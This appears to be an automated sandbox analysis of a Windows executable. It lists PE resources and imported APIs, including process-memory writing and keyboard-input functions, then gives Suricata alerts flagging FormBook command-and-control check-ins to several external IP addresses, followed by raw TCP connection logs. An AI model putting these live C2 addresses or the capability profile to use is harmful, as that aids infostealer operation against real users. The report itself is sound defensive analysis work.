                                                      RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                      RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                      RT_RCDATA0xcc7b80x556b3data1.0003315469810647
                                                      RT_GROUP_ICON0x121e6c0x76dataEnglishGreat Britain0.6610169491525424
                                                      RT_GROUP_ICON0x121ee40x14dataEnglishGreat Britain1.25
                                                      RT_GROUP_ICON0x121ef80x14dataEnglishGreat Britain1.15
                                                      RT_GROUP_ICON0x121f0c0x14dataEnglishGreat Britain1.25
                                                      RT_VERSION0x121f200xdcdataEnglishGreat Britain0.6181818181818182
                                                      RT_MANIFEST0x121ffc0x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814
                                                      DLLImport
                                                      WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                      VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                      WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                      COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                      MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                      WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                      PSAPI.DLLGetProcessMemoryInfo
                                                      IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                      USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                      UxTheme.dllIsThemeActive
                                                      KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                      USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                      GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                      COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                      ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                      SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                      ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                      OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
                                                      Language of compilation systemCountry where language is spokenMap
                                                      EnglishGreat Britain
                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-11-25T13:55:19.746529+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549812172.104.82.7480TCP
                                                      2024-11-25T13:55:39.996367+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54986131.31.196.17780TCP
                                                      2024-11-25T13:55:55.660933+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54990013.248.169.4880TCP
                                                      2024-11-25T13:56:10.385825+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54993413.248.169.4880TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Nov 25, 2024 13:55:17.591808081 CET4981280192.168.2.5172.104.82.74
                                                      Nov 25, 2024 13:55:17.712539911 CET8049812172.104.82.74192.168.2.5
                                                      Nov 25, 2024 13:55:17.712714911 CET4981280192.168.2.5172.104.82.74
                                                      Nov 25, 2024 13:55:17.723021030 CET4981280192.168.2.5172.104.82.74
                                                      Nov 25, 2024 13:55:17.843997002 CET8049812172.104.82.74192.168.2.5
                                                      Nov 25, 2024 13:55:19.733114958 CET8049812172.104.82.74192.168.2.5
                                                      Nov 25, 2024 13:55:19.746376038 CET8049812172.104.82.74192.168.2.5
                                                      Nov 25, 2024 13:55:19.746478081 CET8049812172.104.82.74192.168.2.5
                                                      Nov 25, 2024 13:55:19.746529102 CET4981280192.168.2.5172.104.82.74
                                                      Nov 25, 2024 13:55:19.746529102 CET4981280192.168.2.5172.104.82.74
                                                      Nov 25, 2024 13:55:19.750550032 CET4981280192.168.2.5172.104.82.74
                                                      Nov 25, 2024 13:55:19.870950937 CET8049812172.104.82.74192.168.2.5
                                                      Nov 25, 2024 13:55:30.283099890 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:30.404294968 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:30.404561996 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:30.642164946 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:30.763823032 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.821615934 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.821644068 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.821661949 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.821719885 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:31.821796894 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.821811914 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.821824074 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.821849108 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:31.821878910 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:31.822355032 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.822365999 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.822386980 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.822405100 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:31.823309898 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.823370934 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:31.942569017 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.942658901 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.942713022 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:31.946638107 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.946748018 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:31.946798086 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.022675991 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.022933960 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.022995949 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.026858091 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.026968002 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.027019024 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.144714117 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.546945095 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.546962976 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547002077 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547032118 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547039032 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547051907 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547065973 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547074080 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547086954 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547094107 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547101974 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547111034 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547128916 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547137022 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547139883 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547148943 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547169924 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547183990 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547195911 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547199011 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547233105 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547329903 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547368050 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547378063 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547416925 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547518015 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547553062 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.547570944 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.547610044 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.552088976 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.552150011 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.552356005 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.552402973 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.560292006 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.560345888 CET804983831.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:32.560355902 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:32.560389042 CET4983880192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:33.163569927 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:33.283621073 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:33.283776045 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:33.298970938 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:33.418977976 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.693711042 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.693737984 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.693749905 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.693814993 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.693878889 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.693892002 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.693909883 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.693973064 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.693989038 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.694637060 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.694653988 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.694665909 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.694698095 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.694766998 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.694807053 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.800771952 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.813967943 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.814054012 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.814069033 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.814119101 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.818173885 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.818236113 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.818273067 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.818329096 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.894917965 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.894982100 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.894999027 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.895046949 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.899094105 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.899158955 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.899178028 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.899219990 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.907558918 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.907687902 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.910626888 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.910674095 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.910738945 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.910778999 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.919136047 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.919209003 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.919209957 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.919253111 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.927604914 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.927685976 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.927712917 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.927725077 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.936165094 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.936260939 CET804984531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:34.936264992 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:34.936311007 CET4984580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:35.819652081 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:35.939620018 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:35.939817905 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:35.955215931 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:36.075419903 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:36.075531960 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.394146919 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.394174099 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.394185066 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.394303083 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.394303083 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:37.394316912 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.394361019 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:37.394367933 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.394380093 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.394406080 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.394416094 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:37.394447088 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:37.394479990 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.394495964 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.394551039 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:37.457003117 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:37.514667034 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.514720917 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.514790058 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:37.518774986 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.518817902 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.518832922 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:37.518862009 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:37.527133942 CET804985531.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:37.527193069 CET4985580192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:38.475902081 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:38.596065998 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:38.596225977 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:38.607235909 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:38.728347063 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:39.996143103 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:39.996201992 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:39.996253014 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:39.996268988 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:39.996361971 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:39.996366978 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:39.996378899 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:39.996366978 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:39.996417046 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:39.996490002 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:39.996516943 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:39.996536016 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:39.996751070 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:39.996778965 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:39.996828079 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.116753101 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.116825104 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.116930008 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.120611906 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.120712042 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.120829105 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.200767040 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.200844049 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.200993061 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.204895973 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.204996109 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.205125093 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.213275909 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.216346979 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.216432095 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.216461897 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.224769115 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.224839926 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.224881887 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.233694077 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.233803988 CET4986180192.168.2.531.31.196.177
                                                      Nov 25, 2024 13:55:40.234004021 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.242398024 CET804986131.31.196.177192.168.2.5
                                                      Nov 25, 2024 13:55:40.242479086 CET4986180192.168.2.531.31.196.177
